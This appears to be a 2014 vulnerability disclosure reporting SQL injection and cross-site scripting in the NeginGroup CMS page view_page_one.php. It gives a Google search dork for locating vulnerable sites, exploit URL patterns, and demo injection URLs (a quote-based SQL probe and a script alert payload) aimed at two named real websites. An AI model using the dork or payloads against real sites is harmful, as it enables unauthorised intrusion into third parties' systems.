Sites created by NeginGroup suffer from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
73bf857fa364642f3fa21c1fb9d3e05d25d39ed86e9f9879052560a5cb108b6f
[+] Title: Sql Injection / Xss on NeginGroup CMS
[+] Date: 2014/5/29
[+] Author: Hekt0r
[+] Vendor Homepage: www.NeginGroup.com
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable File: /view_page_one.php
[+} Dork : intext:www.NeginGroup.com
inurl:/view_page_one.php?v=
### Exploitation:
[+] Exploit Sql Injection: http://site/view_page_one.php?v=[SQL-Injection]
[+] Exploit Xss: http://site/view_page_one.php?v=[Xss]
### Demo:
[+] Sqli:http://www.irantwins.com/view_page_one.php?v=1'
http://jovainco.com/view_page_one.php?v=3'
[+] Xss: http://www.irantwins.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
http://jovainco.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
[+] Special Thanks: Root
SmasheR,Mr.Moein,UmPire,Saeed.Jok3r,M4hdi,ALIREZA_PROMIS,LiNuX-LoVeR And
All members of Iran Security Group
[+] iransec.net